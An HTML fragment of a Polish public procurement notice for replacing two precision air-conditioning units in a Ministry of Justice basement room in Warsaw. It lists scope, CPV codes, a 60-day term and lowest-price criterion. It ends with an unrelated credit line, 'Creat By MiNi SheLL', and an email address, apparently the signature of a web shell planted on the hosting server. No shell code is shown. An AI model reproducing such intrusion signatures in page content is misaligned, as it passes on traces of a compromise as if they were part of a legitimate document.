<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana 2 kompletów klimatyzacji precyzyjnej typ Hiflex S08LUA firmy Emmerson Network Power zainstalowanych w budynku Ministerstwa Sprawiedliwości przy ul. Zwycięzców 34 w Warszawie - piwnica, pom. 011, na nowe urządzenia klimatyzacji precyzyjnej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II zamówienia obejmuje wymianę 2 kompletów klimatyzacji precyzyjnej typ Hiflex S08LUA firmy Emmerson Network Power zainstalowanych w budynku Ministerstwa Sprawiedliwości przy ul. Zwycięzców 34 w Warszawie - piwnica, pom. 011, na nowe urządzenia klimatyzacji precyzyjnej.
Wymiana polega na demontażu zainstalowanych urządzeń, ich transporcie do utylizacji i utylizacji oraz dostawie, instalacji i uruchomieniu nowych urządzeń.

                Opis istniejących urządzeń, żądane parametry powietrza, wymagania techniczno-
                 instalacyjne, wytyczne dla branż, warunki odbioru zawarte są w załączniku nr 2 do 
                 umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.72.00-3, 50.53.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com